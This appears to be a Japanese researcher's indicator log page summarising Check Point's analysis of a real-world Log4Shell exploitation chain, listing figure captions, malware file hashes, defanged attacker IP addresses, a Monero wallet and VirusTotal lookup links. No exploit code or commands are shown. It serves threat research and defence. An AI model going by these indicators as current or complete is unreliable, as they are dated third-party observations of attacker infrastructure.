TT Malware Log

マルウェア / サイバー攻撃 / 解析技術 に関する「個人」の調査・研究・参照ログ

トップ > ライブラリ: Apache Log4j > A deep dive into a real-life Log4j exploitation

A deep dive into a real-life Log4j exploitation

ライブラリ: Apache Log4j 脆弱性: Log4Shell

【図表】

f:id:tanigawa:20211216112509p:plain
Exploit variants.
f:id:tanigawa:20211216112548p:plain
The initial exploitation attempt sample.
f:id:tanigawa:20211216112611p:plain
Infection Chain.
f:id:tanigawa:20211216112626p:plain
0I8h4xuvxe PowerShell script.
f:id:tanigawa:20211216112646p:plain
StealthLoader copies itself to the Temp folder.
f:id:tanigawa:20211216112741p:plain
The malware uses the sleep function to suspend its own execution.
f:id:tanigawa:20211216112759p:plain
Obfuscation techniques to avoid static analysis.
出典: https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/


【ブログ】

◆A deep dive into a real-life Log4j exploitation (Check Point, 2021/12/14)
[Log4jを悪用する実例を徹底解説]
https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/


【インディケータ情報】

■ハッシュ情報(Sha256) - -

457b254439cdbbc167b45abc09d9531b59ac7b104e847e453e5abd016991a6e2
8c4b72544f1791dd27e87f13a1c9d3070bb70f979e5e2ec98160f9f31945f33b

(以上は Check Point の情報: 引用元は https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/ )


■IPアドレス情報 - -

188[.]126.89.151
52[.]114.77.236
176[.]12.177.110
87[.]71.62.56
95[.]101.133.173
2[.]21.7.180
2[.]56.59.123

(以上は Check Point の情報: 引用元は https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/ )


■Monero wallet

4AeriA3wiocD9gUjiw7qptRDfECriZJac8CgGbfUUPUmMSYtLE43dr2XXDN6t5vd1GWMeGjNFSDh5NUPKBKU3bBz8uatDoC


【検索】

google: ]457b254439cdbbc167b45abc09d9531b59ac7b104e847e453e5abd016991a6e2
google: ]8c4b72544f1791dd27e87f13a1c9d3070bb70f979e5e2ec98160f9f31945f33b

google: "188.126.89.151"
google: "52.114.77.236"
google: "176.12.177.110"
google: "87.71.62.56"
google: "95.101.133.173"
google: "2.21.7.180"
google: "2.56.59.123"

google: "4AeriA3wiocD9gUjiw7qptRDfECriZJac8CgGbfUUPUmMSYtLE43dr2XXDN6t5vd1GWMeGjNFSDh5NUPKBKU3bBz8uatDoC"


【VT検索】

https://www.virustotal.com/gui/file/457b254439cdbbc167b45abc09d9531b59ac7b104e847e453e5abd016991a6e2
https://www.virustotal.com/gui/file/8c4b72544f1791dd27e87f13a1c9d3070bb70f979e5e2ec98160f9f31945f33b

https://www.virustotal.com/gui/ip-address/188.126.89.151
https://www.virustotal.com/gui/ip-address/52.114.77.236
https://www.virustotal.com/gui/ip-address/176.12.177.110
https://www.virustotal.com/gui/ip-address/87.71.62.56
https://www.virustotal.com/gui/ip-address/95.101.133.173
https://www.virustotal.com/gui/ip-address/2.21.7.180
https://www.virustotal.com/gui/ip-address/2.56.59.123

Copyright (C) 谷川哲司 (Tetsuji Tanigawa) 1997 - 2023